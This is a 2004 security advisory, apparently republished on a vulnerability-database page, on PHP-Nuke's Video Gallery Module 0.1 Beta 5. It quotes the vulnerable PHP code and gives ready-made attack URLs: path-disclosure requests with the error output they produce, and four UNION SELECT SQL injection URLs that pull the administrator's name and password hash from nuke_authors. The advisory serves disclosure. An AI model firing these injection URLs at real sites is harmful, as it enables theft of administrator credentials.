Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

phpnukeVideo.txt

🗓️ 28 Apr 2004 00:00:00Reported by DarkBichoType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

Multiple vulnerabilities found in PHP-Nuke Video Gallery Module version 0.1 Beta 5, dated April 26, 2004.

Code
`Adivore: http://bichosoft.webcindario.com/advisory-03.txt  
  
===========================================================================  
=================== Multiple vulnerabilities PHP-Nuke =====================  
=================== Video Gallery Module for PHP-Nuke =====================  
  
PROGRAM: PHP-Nuke Video Gallery Module for PHP-Nuke  
HOMEPAGE: http://videogallery.engorile.com/  
VERSION: 0.1 Beta 5  
BUG: Multiple vulnerabilities  
DATE: 26/04/2004  
AUTHOR: DarkBicho  
web: http://www.darkbicho.tk  
team: Security Wari Proyects <www.swp-zone.org>  
Email: [email protected]  
  
===========================================================================  
===========================================================================  
  
  
Vulnerabilities:  
---------------  
  
1.- CODE:  
¨¨¨¨  
================================ CODE ===================================  
function render_detail_clip($clipid, $catid){  
global $prefix, $dbi, $module_name;  
$tipomime="application/unknown";  
$next=next_clips($clipid, $catid);  
$result=sql_query("select descripcion, url_thumb, url_preview, accesos from   
".$prefix."_videos_clips where clipid=$clipid", $dbi);  
list($descripcion, $url_thumb, $url_preview,   
$accesos)=sql_fetch_row($result, $dbi);  
$resultado=AbreTabla();  
if ($next["previous"]){  
$resultado.="<a   
href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["previous"]."&catid=$catid>"._PREVIOUS."</a>";  
}  
$resultado.="</td><td align=right>";  
if ($next["next"]){  
$resultado.="<a   
href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["next"]."&catid=$catid>"._NEXT."</a>";  
}  
$resultado.=CierraTabla().AbreTabla().$descripcion."</td></tr><tr><td>";  
if ($url_preview != ""){  
$tipomime=tipomime($clipid, "clips");  
$result2=sql_query("select class_id, options_object, options_embed from   
".$prefix."_videos_tipos where tipomime='$tipomime'", $dbi);  
list($class_id, $options_object, $options_embed)=sql_fetch_row($result2,   
$dbi);  
$resultado.="<center>".mete_video($url_preview, $tipomime, 160,   
120)."</center>";  
  
}  
else{  
$resultado.="<center><img src=\"$url_thumb\"></center>";  
}  
$resultado.=CierraTabla().AbreTabla().votacion_clip($clipid, $catid);  
if (count_total($clipid, "clip", "ficheros") > 0){  
$resultado.=CierraTabla().AbreTabla().clip_files($clipid,   
$catid).CierraTabla();  
}  
else{  
$resultado.=CierraTabla();  
}  
$accesos++;  
sql_query("update ".$prefix."_videos_clips set accesos=$accesos where   
clipid=$clipid", $dbi);  
return "$resultado";  
}  
  
=========================================================================  
  
2.- Full path disclosure:  
¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨  
  
This vulnerability would allow a remote user to determine the full  
path to the web root directory and other potentially sensitive   
information.  
  
A)   
http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=darkbicho  
  
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL   
result resource in   
/home/hosting/php-nuke/includes/sql_layer.php on line 286  
  
B)   
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1  
  
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL   
result resource in   
/home/hosting/php-nuke/includes/sql_layer.php on line 286  
  
  
  
3.- Sql injection:  
¨¨¨¨¨¨¨¨¨¨¨¨¨¨  
This sql injection exploit can pull out from database any information,   
for example  
superadmin's username and password's md5 hash:  
  
  
A)   
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1  
  
B)  
http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors  
  
c)  
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1  
  
D)  
http://[target]/modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1  
  
  
SOLUTION:  
¨¨¨¨¨¨¨¨  
Vendors were contacted many weeks ago and plan to release a fixed   
version soon.  
Check the Video Gallery website for updates and official release   
details.  
  
_________________________________________________________________  
Charla con tus amigos en línea mediante MSN Messenger:   
http://messenger.latam.msn.com/  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Apr 2004 00:00Current
7.4High risk
Vulners AI Score7.4
php-nuke vulnerabilitiesvideo gallery moduledarkbicho security wari proyectsapril 2004
19